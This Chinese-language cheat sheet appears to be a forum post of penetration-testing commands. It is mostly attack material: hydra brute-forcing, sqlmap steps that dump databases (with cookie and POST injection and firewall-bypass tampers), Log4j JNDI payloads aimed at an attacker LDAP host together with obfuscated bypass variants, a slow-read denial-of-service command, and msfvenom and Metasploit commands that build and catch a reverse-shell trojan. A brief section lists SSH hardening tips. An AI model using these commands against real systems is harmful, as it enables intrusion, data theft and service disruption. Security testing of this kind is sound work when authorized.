1.hydra[海德拉]:- 密码能否被破解,关键取决于字典是否强大,
- 使用:
- hydra -L user -P passlist.txt ftp://192.168.0.1
- 暴力破解的防御
- useradd shell #对于不需要登录的用户,在新建用户的时候可以加入" -s /sbin/nologin"
- 密码的复杂性 #字母大小写+数字+特殊字符+20位以上+1个月更换一次
- 修改默认的端口 #修改"vim /etc/ssh/sshd_config"文件
- 组织登录的用户或组 #不允许用户登录,"PermitRootLogin yes" 添加特定的登录用户 ,"AllowUsers xxx"
- 使用sudo #
- 设置允许访问的IP #"/etc/hosts.allow" 只允许从堡垒机访问
- 使用DenyHosts自动统计,并将其加入到"/etc/hosts.deny"
- 禁用密码改用公钥认证登录
- 保护XSHELL导出会话文件
复制代码 2.XSS漏洞复现工具(BeFF):- BeFF在Kali中已经自动集成,在运行BeFF之前要先开启Kali apache服务,"service apache start",所有要访问的页面在"/var/www/html"目录下面,也可以新建测试html页面。
- 在使用"systemctl start beef-xss.service "来开启BeFF服务,在Kali机的桌面也要启动BeFF的监听服务,默认端口为3000端口,
复制代码 3.NMAP:- nmap -sn [IP] #主机发现
- nmap -sS [端口] [IP] #端口扫描(TCP端口扫描)
- nmap -O [IP] #系统扫描
- namp -sV [IP] #版本扫描
- nmap -Pn[IP] #跳过主机发现
- nmap -sU[IP] #用户udp扫描
复制代码 4.SQLMAP:
一般的数据库注入步骤:- 1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点
- 2. --dbs 【检测站点包含哪些数据库
- 3. --current-db 【获取当前的数据库名
- 4. --tables -D "db_name" 【获取指定数据库中的表名 -D后接指定的数据库名称
- 5. --columns -T "table_name" -D "db_name" 【获取数据库表中的字段
- 6. --dump -C "columns_name" -T "table_name" -D "db_name" 【获取字段的数据内容
复制代码 Cookie注入:- sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2 【cookie注入 后接cookie值
复制代码 POST注入:- (1)目标地址http:// www.xxx.com /login.asp
- (2)打开brup代理。
- (3)点击表单提交
- (4)burp获取拦截信息(post)
- (5)右键保存文件(.txt)到指定目录下
- (6)运行sqlmap并执行如下命令:
- 用例:sqlmap -r okay.txt -p username
- -r表示加载文件(及步骤(5)保存的路径),-p指定参数(即拦截的post请求中表单提交的用户名或密码等name参数)
- (7)自动获取表单:--forms自动获取表单
- 例如:sqlmap -u www.xx.com/login.asp --forms
- (8)指定参数搜索:--data
- 例如:sqlmap -u www.xx.com/login.asp --data "username=1"
复制代码 SQLMAP常用的命令:- 1. --purge 【重新扫描(--purge 删除原先对该目标扫描的记录)
- 2. --tables 【获取表名
- 3. --dbs 【检测站点包含哪些数据库
- 4. --current-db 【获取当前的数据库名
- 5. --current-user 【检测当前用户
- 6. --is-dba 【判断站点的当前用户是否为数据库管理员
- 7. --batch 【默认确认,不询问你是否输入
- 8. --search 【后面跟参数 -D -T -C 搜索列(C),表(T)和或数据库名称(D)
- 9. --threads 10 【线程,sqlmap线程最高设置为10
- 10. --level 3 【sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头
- 的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5
- 11. --risk 3 【执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全
- 12. -v 【详细的等级(0-6)
- 0:只显示Python的回溯,错误和关键消息。
- 1:显示信息和警告消息。
- 2:显示调试消息。
- 3:有效载荷注入。
- 4:显示HTTP请求。
- 5:显示HTTP响应头。
- 6:显示HTTP响应页面的内容
- 13. --privileges 【查看权限
- 14. --tamper xx.py,cc.py 【防火墙绕过,后接tamper库中的py文件
- 15. --method "POST" --data "page=1&id=2" 【POST方式提交数据
- 16. --threads number 【采用多线程 后接线程数
- 17. --referer "" 【使用referer欺骗
- 18. --user-agent "" 【自定义user-agent
- 19. --proxy “目标地址″ 【使用代理注入
复制代码 Kali系统集成的SQLMAP工具目录:- sqlmap常用路径:
- 1. 添加表字段的目录在sqlmap/txt/common-tables.txt
- 2. 存放扫描记录的目录在sqlmap/output
复制代码 5.Log4j检测及绕过:- 检测:
- ${jndi:ldap://4jvfqe.ceye.io/exp}
- 绕过:
- 原本POC:
- ${jndi:ldap://malicious-ldap-server.com/a}
- 绕过的POC:
- ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a}
- 可行的POC:
- ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a}
复制代码 6.接口反序列化测试:- {"@type":"java.net.InetSocketAddress"{
- "address":,
- "val":"cyl31t.dnslog.cn"}}
复制代码 7.Kali自集成的web目录扫描工具:- dirb
- 使用方法:
- dirb [URL]
- 它的字典放在:
- /usr/share/dirb/wordlist/common.txt
- 如果指定文件类型扫描,则使用如下命令:
- dirb [URL] -X .txt,.php,.zip
复制代码 8.slowhttptest使用语句- slowhttptest -c 8000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://www.xxx.com -p 3
复制代码 9.MSF生成远控木马命令- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[攻击机IP] lport=[攻击机监听端口] -f exe -o demo.exe
复制代码 下一步开启msf的监听,等待木马上线- use exploit/mutil/handler
- set payload windows/x64/meterpreter/reverse_tcp
- set lhost [攻击机IP]
- set lport [攻击机端口]
- run
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |